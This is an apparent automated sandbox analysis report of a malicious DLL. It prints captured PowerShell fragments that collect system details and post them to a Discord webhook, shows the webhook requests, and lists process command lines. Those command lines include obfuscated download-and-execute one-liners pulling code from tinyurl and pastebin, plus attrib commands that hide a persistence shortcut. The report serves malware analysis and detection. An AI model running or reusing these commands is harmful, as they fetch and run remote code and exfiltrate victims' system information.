                                                            2024-10-15 14:00:34 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:34 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:34 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:34 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:34 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:34 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.649971162.159.136.2324432248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:40 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:40 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:41 UTC1253INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:40 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000842
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykgrJhrdQAuXIF%2FQKSeE60CJ37pvq8%2Bc5vmP6qWBgJ93tUd3Qeejir6C8t2jVEUmYaLY6XNSD48senElWeEarjuzGLieg2WRFr8Fxn0KluQiH6wzX9lRMMTH0zmt"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=eCs98e8dAlxe0U1ShJkr5nbDFUYVwumZQuMHhZ8z4IA-1729000840964-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3056374bf86900-DFW
                                                            2024-10-15 14:00:41 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.650012162.159.136.2324433780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:48 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:48 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:48 UTC1263INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:48 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000849
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpGZhnGytTbBzZ%2BcgkX91TRStmAqOqXKjT%2B4jB6yA%2BdlxoO%2B9st0%2F2KXqIql7L%2FLeppQTltStmbM3Wb2el9wWCKsucMJptU37J5gmQIGd3om9sRfkTM4G4n6YV%2F3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=26fb985b43ebf471a437580369e1a2bbe44f8557-1729000848; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=L72acNRxEN0zEuoWczc9wPsvJRIRmfHA8n91nvmo6jE-1729000848317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d305665596e4746-DFW
                                                            2024-10-15 14:00:48 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\loaddll64.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll"
                                                            Imagebase:0x7ff650d90000
                                                            File size:165'888 bytes
                                                            MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
                                                            Imagebase:0x7ff7fb1b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\regsvr32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
                                                            Imagebase:0x7ff7b3930000
                                                            File size:25'088 bytes
                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
                                                            Imagebase:0x7ff7f47c0000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
                                                            Imagebase:0x7ff7f47c0000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:09:59:54
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:09:59:57
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:10:00:21
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            Imagebase:0x7ff6a71e0000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\forfiles.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                            Imagebase:0x7ff634000000
                                                            File size:52'224 bytes
                                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:10:00:22
                                                            Start date:15/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
